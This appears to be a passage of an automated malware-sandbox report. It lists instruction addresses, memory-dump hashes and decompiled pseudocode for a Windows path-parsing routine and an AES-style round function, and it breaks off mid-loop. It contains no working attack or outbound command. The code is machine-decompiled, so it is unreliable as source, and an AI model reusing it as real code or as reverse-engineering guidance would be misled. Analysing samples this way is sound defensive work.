                                          0x033c7368
                                          0x033c7350
                                          0x033c7351
                                          0x033c7351
                                          0x00000000
                                          0x033c7332
                                          0x0340f8f9
                                          0x0340f8f9
                                          0x0340f8fa
                                          0x00000000
                                          0x0340f8fa
                                          0x033c7306
                                          0x033c730e
                                          0x0340f8ee
                                          0x00000000
                                          0x00000000
                                          0x0340f8f4
                                          0x00000000
                                          0x033c730e
                                          0x033c7214
                                          0x033c7214
                                          0x033c7217
                                          0x00000000
                                          0x033c7217
                                          0x033c702c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c702c
                                          0x033c708d
                                          0x033c7094
                                          0x033c7098
                                          0x033c70a0
                                          0x033c738c
                                          0x033c738d
                                          0x033c738d
                                          0x033c70a0
                                          0x033c7098
                                          0x033c70a6
                                          0x033c70ab
                                          0x033c70b3
                                          0x033c70b5
                                          0x033c70cd
                                          0x033c70cd
                                          0x033c70d0
                                          0x033c70d8
                                          0x033c711a
                                          0x033c711c
                                          0x033c711c
                                          0x033c7121
                                          0x00000000
                                          0x00000000
                                          0x033c7129
                                          0x00000000
                                          0x00000000
                                          0x033c712b
                                          0x033c712b
                                          0x033c7130
                                          0x033c737e
                                          0x033c7381
                                          0x00000000
                                          0x033c7381
                                          0x033c7138
                                          0x00000000
                                          0x00000000
                                          0x033c7144
                                          0x033c7144
                                          0x033c70da
                                          0x033c70da
                                          0x033c70dd
                                          0x00000000
                                          0x033c70dd
                                          0x033c70b7
                                          0x033c70b8
                                          0x033c70bb
                                          0x033c70c2
                                          0x00000000
                                          0x00000000
                                          0x033c70c7
                                          0x00000000
                                          0x00000000
                                          0x033c70c9
                                          0x033c70ca
                                          0x00000000
                                          0x033c70ad
                                          0x033c70ad
                                          0x033c70af
                                          0x00000000
                                          0x033c70af
                                          0x033c7148
                                          0x033c714d
                                          0x0340f8e2
                                          0x0340f8e2
                                          0x033c7153
                                          0x033c7154
                                          0x033c7157
                                          0x00000000
                                          0x033c7157
                                          0x0340f87c
                                          0x0340f87f
                                          0x0340f882
                                          0x00000000
                                          0x0340f882
                                          0x0340f85e
                                          0x00000000
                                          0x00000000
                                          0x0340f864
                                          0x0340f869
                                          0x0340f86c
                                          0x00000000
                                          0x0340f86c
                                          0x033c7168
                                          0x033c7170
                                          0x0340f8d6
                                          0x0340f8d6
                                          0x033c7176
                                          0x033c7179
                                          0x00000000
                                          0x033c7179
                                          0x033c6fe9
                                          0x033c6fe9
                                          0x00000000
                                          0x033c6fe9
                                          0x033c6fbf
                                          0x033c6f8c
                                          0x033c6f93
                                          0x033c72d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c72d6
                                          0x033c6f99
                                          0x033c6f99
                                          0x033c6f99
                                          0x00000000
                                          0x033c6f68
                                          0x033c6f50
                                          0x033c6f56
                                          0x033c722c
                                          0x0340f629
                                          0x0340f629
                                          0x00000000
                                          0x0340f629
                                          0x033c7232
                                          0x033c7239
                                          0x0340f623
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0340f623
                                          0x033c723f
                                          0x033c7242
                                          0x0340f64e
                                          0x0340f64e
                                          0x00000000
                                          0x0340f64e
                                          0x033c7248
                                          0x033c724f
                                          0x033c7373
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c7379
                                          0x033c7255
                                          0x033c7258
                                          0x0340f63c
                                          0x0340f648
                                          0x00000000
                                          0x0340f648
                                          0x033c725e
                                          0x033c7265
                                          0x0340f636
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0340f636
                                          0x033c726b
                                          0x033c726b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c6f56
                                          0x033c6f3d
                                          0x033c6ed2
                                          0x00000000
                                          0x033c6ec4

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc73fb7f31425b27db2c3fc0c61d1c55de956b31f6ee04f232a6ec00914a65b2
                                          • Instruction ID: ba215c52af14d394d769b2f31c66451588330e7ec57821a89f47d1b1f0aec580
                                          • Opcode Fuzzy Hash: fc73fb7f31425b27db2c3fc0c61d1c55de956b31f6ee04f232a6ec00914a65b2
                                          • Instruction Fuzzy Hash: 24027D71D242A58FCB28CF99C8C06ADF7B5BF44700F29412EE856AB690E7749C95CF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033C4120, Relevance: .4, Instructions: 444COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E033C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x349d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E033DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E033C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L033C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E033C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M033C45F8))) {
												case 0:
													_v568 = 0x3381078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x33811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L033C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E033EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E033EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E033A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E033BEB70(1, 0x34979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E033BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E033E95D0();
																			L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E033EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E033E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E033EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                          0x033c4128
                                          0x033c4135
                                          0x033c413c
                                          0x033c4141
                                          0x033c4145
                                          0x033c4147
                                          0x033c414e
                                          0x033c4151
                                          0x033c4159
                                          0x033c415c
                                          0x033c4160
                                          0x033c4164
                                          0x033c4168
                                          0x033c416c
                                          0x033c417f
                                          0x033c4181
                                          0x033c446a
                                          0x033c446a
                                          0x033c418c
                                          0x033c4195
                                          0x033c4199
                                          0x033c4432
                                          0x033c4439
                                          0x033c443d
                                          0x033c4442
                                          0x033c4447
                                          0x00000000
                                          0x033c419f
                                          0x033c41a3
                                          0x033c41b1
                                          0x033c41b9
                                          0x033c41bd
                                          0x033c45db
                                          0x033c45db
                                          0x00000000
                                          0x033c41c3
                                          0x033c41c3
                                          0x033c41ce
                                          0x033c41d4
                                          0x0340e138
                                          0x0340e13e
                                          0x0340e169
                                          0x0340e16d
                                          0x0340e19e
                                          0x0340e16f
                                          0x0340e16f
                                          0x0340e175
                                          0x0340e179
                                          0x0340e18f
                                          0x0340e193
                                          0x00000000
                                          0x0340e199
                                          0x00000000
                                          0x0340e199
                                          0x0340e193
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c41da
                                          0x033c41da
                                          0x033c41df
                                          0x033c41e4
                                          0x033c41ec
                                          0x033c4203
                                          0x033c4207
                                          0x0340e1fd
                                          0x033c4222
                                          0x033c4226
                                          0x0340e1f3
                                          0x0340e1f3
                                          0x033c422c
                                          0x033c422c
                                          0x033c4233
                                          0x0340e1ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c4239
                                          0x033c4239
                                          0x033c4239
                                          0x033c4239
                                          0x033c4233
                                          0x033c4226
                                          0x033c41ee
                                          0x033c41ee
                                          0x033c41f4
                                          0x033c4575
                                          0x0340e1b1
                                          0x0340e1b1
                                          0x00000000
                                          0x033c457b
                                          0x033c457b
                                          0x033c4582
                                          0x0340e1ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c4588
                                          0x033c4588
                                          0x033c458c
                                          0x0340e1c4
                                          0x0340e1c4
                                          0x00000000
                                          0x033c4592
                                          0x033c4592
                                          0x033c4599
                                          0x0340e1be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c459f
                                          0x033c459f
                                          0x033c45a3
                                          0x0340e1d7
                                          0x0340e1e4
                                          0x00000000
                                          0x033c45a9
                                          0x033c45a9
                                          0x033c45b0
                                          0x0340e1d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c45b6
                                          0x033c45b6
                                          0x033c45b6
                                          0x00000000
                                          0x033c45b6
                                          0x033c45b0
                                          0x033c45a3
                                          0x033c4599
                                          0x033c458c
                                          0x033c4582
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c41f4
                                          0x033c423e
                                          0x033c4241
                                          0x033c45c0
                                          0x033c45c4
                                          0x00000000
                                          0x033c45ca
                                          0x033c45ca
                                          0x00000000
                                          0x0340e207
                                          0x0340e20f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033c45d1
                                          0x00000000
                                          0x00000000
                                          0x033c45ca
                                          0x00000000
                                          0x033c4247
                                          0x033c4247
                                          0x033c4247
                                          0x033c4249
                                          0x033c4249
                                          0x033c4249
                                          0x033c4251
                                          0x033c4251
                                          0x033c4257
                                          0x033c425f
                                          0x033c426e
                                          0x033c4270
                                          0x033c427a
                                          0x0340e219
                                          0x0340e219
                                          0x033c4280
                                          0x033c4282
                                          0x033c4456
                                          0x033c45ea
                                          0x00000000
                                          0x033c45f0
                                          0x0340e223
                                          0x00000000
                                          0x0340e223
                                          0x033c445c
                                          0x033c445c
                                          0x00000000
                                          0x033c445c
                                          0x00000000
                                          0x033c4288
                                          0x033c428c
                                          0x0340e298
                                          0x033c4292
                                          0x033c4292
                                          0x033c429e
                                          0x033c42a3
                                          0x033c42a7
                                          0x033c42ac
                                          0x0340e22d
                                          0x033c42b2
                                          0x033c42b2
                                          0x033c42b9
                                          0x033c42bc
                                          0x033c42c2
                                          0x033c42ca
                                          0x033c42cd
                                          0x033c42cd
                                          0x033c42d4
                                          0x033c433f
                                          0x033c433f
                                          0x033c42d6
                                          0x033c42d6
                                          0x033c42d9
                                          0x033c42dd
                                          0x033c42eb
                                          0x0340e23a
                                          0x033c42f1
                                          0x033c4305
                                          0x033c430d
                                          0x033c4315
                                          0x033c4318
                                          0x033c431f
                                          0x033c4322
                                          0x033c432e
                                          0x033c433b
                                          0x033c433b
                                          0x00000000
                                          0x033c432e
                                          0x033c42eb
                                          0x033c434c
                                          0x033c434e
                                          0x033c4352
                                          0x033c4359
                                          0x033c435e
                                          0x033c4361
                                          0x033c436e
                                          0x033c438a
                                          0x033c438e
                                          0x033c4396
                                          0x033c439e
                                          0x033c43a1
                                          0x033c43ad
                                          0x033c43bb
                                          0x033c43bb
                                          0x033c43ad
                                          0x033c436e
                                          0x033c43bf
                                          0x033c43c5
                                          0x033c4463
                                          0x033c4463
                                          0x033c43ce
                                          0x033c43d5
                                          0x033c43d9
                                          0x033c43df
                                          0x033c4475
                                          0x033c4479
                                          0x033c4491
                                          0x033c4491
                                          0x033c4479
                                          0x033c43e5
                                          0x033c43eb
                                          0x033c43f4
                                          0x033c43f6
                                          0x033c43f9
                                          0x033c43fc
                                          0x033c43ff
                                          0x033c44e8
                                          0x033c44ed
                                          0x033c44f3
                                          0x0340e247
                                          0x00000000
                                          0x033c44f9
                                          0x033c4504
                                          0x033c4508
                                          0x033c450f
                                          0x0340e269
                                          0x00000000
                                          0x033c4515
                                          0x033c4519
                                          0x033c4531
                                          0x033c4534
                                          0x033c4537
                                          0x033c453e
                                          0x033c4541
                                          0x033c454a
                                          0x0340e255
                                          0x0340e255
                                          0x0340e25b
                                          0x0340e25e
                                          0x0340e261
                                          0x0340e261
                                          0x033c4555
                                          0x033c4559
                                          0x033c455d
                                          0x0340e26d
                                          0x0340e270
                                          0x0340e274
                                          0x0340e27a
                                          0x0340e27d
                                          0x0340e28e
                                          0x0340e28e
                                          0x033c4563
                                          0x033c4563
                                          0x033c4569
                                          0x033c4569
                                          0x00000000
                                          0x033c455d
                                          0x033c450f
                                          0x00000000
                                          0x033c44f3
                                          0x033c43ff
                                          0x033c4405
                                          0x033c4405
                                          0x033c4405
                                          0x033c42ac
                                          0x033c428c
                                          0x033c4282
                                          0x033c4407
                                          0x033c440d
                                          0x0340e2af
                                          0x0340e2af
                                          0x033c4413
                                          0x033c4413
                                          0x00000000
                                          0x033c41d4
                                          0x00000000
                                          0x033c41c3
                                          0x033c41bd
                                          0x033c4415
                                          0x033c4415
                                          0x033c4416
                                          0x033c4417
                                          0x033c4429
                                          0x033c416e
                                          0x033c416e
                                          0x033c4175
                                          0x033c4498
                                          0x033c449f
                                          0x0340e12d
                                          0x00000000
                                          0x0340e133
                                          0x00000000
                                          0x0340e133
                                          0x033c44a5
                                          0x033c44a5
                                          0x033c44aa
                                          0x00000000
                                          0x033c44bb
                                          0x033c44ca
                                          0x033c44d6
                                          0x033c44d7
                                          0x033c44d8
                                          0x033c44e3
                                          0x033c44e3
                                          0x033c44aa
                                          0x033c417b
                                          0x033c417b
                                          0x033c417b
                                          0x00000000
                                          0x033c417b
                                          0x033c4175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c70c303f4b1642ec7dfe2e79f67cb889f10896ee949d67d86e08360d027328e2
                                          • Instruction ID: b62d427545a8ede3fc7ac6941037a2abf171b3cc143f348e1347373cbc0dd528
                                          • Opcode Fuzzy Hash: c70c303f4b1642ec7dfe2e79f67cb889f10896ee949d67d86e08360d027328e2
                                          • Instruction Fuzzy Hash: 08F18C74A187918BC725CF1AC8D0A7AB7E5EF88714F18496EF486CB290E734DC91CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 26%
                                          			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
